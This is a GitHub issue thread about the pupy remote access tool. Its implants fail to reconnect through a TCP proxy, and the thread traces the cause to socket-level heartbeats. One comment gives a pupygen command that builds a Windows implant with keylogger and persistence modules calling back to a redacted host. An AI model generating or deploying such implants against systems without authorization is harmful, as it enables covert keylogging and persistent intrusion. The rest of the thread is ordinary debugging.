### ISSUE TITLE
agents appear to never attempt reconnection

### ISSUE THREAD

**Issue by Viss** [n1nj4sec/pupy#116]
It would appear that if the agent loses connectivity with the server, it never tries to re-establish the connection.

Steps to reproduce:
1) spin off a windows payload
2) copy payload to windows box
3) start pupy server
4) execute payload
5) observe agent phoning home successfully
6) exit pupy server
7) restart pupy server
8) observe exe still running in windows environment, but the connection is never re-established.

**Comment by n1nj4sec** [comment]
it works for me ...
```
root@myhost:~/pupy# ./pupysh.py 

            _____                    _       _ _            
 ___ ___   |  _  |_ _ ___ _ _    ___| |_ ___| | |   ___ ___ 
|___|___|  |   __| | | . | | |  |_ -|   | -_| | |  |___|___|
           |__|  |___|  _|_  |  |___|_|_|___|_|_|           
                     |_| |___|                              

                   v1.3 (Jun 17 2016)

Author:           Nicolas VERDIER  < @n1nj4sec > (contact@n1nj4.eu)
Bleeding edge:    https://github.com/n1nj4sec/pupy

[*] Server started on port 443 with transport ssl
[*] Session 1 opened (192.168.1.6:443 <- 0.0.0.0:0)
>> sessions 
id  user  hostname  platform  release  os_arch  proc_arch  address             
-------------------------------------------------------------------------------
1   me    me-PC     Windows   7        AMD64    32bit      ::ffff:192.168.1.5
>> exit
root@myhost:~/pupy# ./pupysh.py 

            _____                    _       _ _            
 ___ ___   |  _  |_ _ ___ _ _    ___| |_ ___| | |   ___ ___ 
|___|___|  |   __| | | . | | |  |_ -|   | -_| | |  |___|___|
           |__|  |___|  _|_  |  |___|_|_|___|_|_|           
                     |_| |___|                              

                   v1.3 (Jun 17 2016)

Author:           Nicolas VERDIER  < @n1nj4sec > (contact@n1nj4.eu)
Bleeding edge:    https://github.com/n1nj4sec/pupy

[*] Server started on port 443 with transport ssl
[*] Session 1 opened (192.168.1.6:443 <- 0.0.0.0:0)
>> exit
root@myhost:~/pupy# ./pupysh.py 

            _____                    _       _ _            
 ___ ___   |  _  |_ _ ___ _ _    ___| |_ ___| | |   ___ ___ 
|___|___|  |   __| | | . | | |  |_ -|   | -_| | |  |___|___|
           |__|  |___|  _|_  |  |___|_|_|___|_|_|           
                     |_| |___|                              

                   v1.3 (Jun 17 2016)

Author:           Nicolas VERDIER  < @n1nj4sec > (contact@n1nj4.eu)
Bleeding edge:    https://github.com/n1nj4sec/pupy

[*] Server started on port 443 with transport ssl
[*] Session 1 opened (192.168.1.6:443 <- 0.0.0.0:0)
>> sessions 
id  user  hostname  platform  release  os_arch  proc_arch  address             
-------------------------------------------------------------------------------
1   me    me-PC     Windows   7        AMD64    32bit      ::ffff:192.168.1.5
>> exit
```
I need a little more informations, like screenshots, agent's windows version, transport used, traceback when you use a pure python payload (install python on the windows and generate a pure python payload with pupygen -f py, then run it and print the traceback when you exit/restart the server)

**Comment by Viss** [comment]
so I'm using this on a live engagement at the moment, I can't provide screenshots.
- The windows machine is Windows Server 2008 R2
- The command line used to generate the payload:  ./pupygen.py -f exe_x64 -s keylogger -s persistence  connect --host xxxxx:xxxx
I can't install python on the windows server in question because it's not mine - I've done everything on an ubuntu box - the generating of payloads and the server that listens for the returning shell. 

I have RDP access to this server, and I can see that the binary is still running.

I think, though, that it may be a tcp issue. I have a simple tcp proxy written in go that lives on the internet and I'm using that proxy to get th pupy shell to phone home - I wonder if perhaps a proxy being used by pupy is whats causing the problem? Let me try regenerating the payload to skip the proxy and see what happens.

**Comment by Viss** [comment]
Hm - okay, so removing the proxy fixes the problem. 
My guess is that pupy judges its connectivity based on the existence of a socket, instead of with a heartbeat or other end to end comms.

**Comment by Viss** [comment]
basically this means that if the proxy is up, but the host on the remote side of the proxy is down, pupy may think the connection is still okay because it has a socket open to the proxy, which is still up.

**Comment by n1nj4sec** [comment]
Yes if the socket is open and responding to TCP heartbeats (set with setsockopt), the connection is considered OK. I think there might be a problem with your proxy because it works fine when I use a ssh remote port forwarding (-R). Your proxy should refuse connections when the other end is not open & ready.

**Comment by n1nj4sec** [comment]
And if your socket is closed on pupy server side, your proxy should close (& shutdown) the client socket too
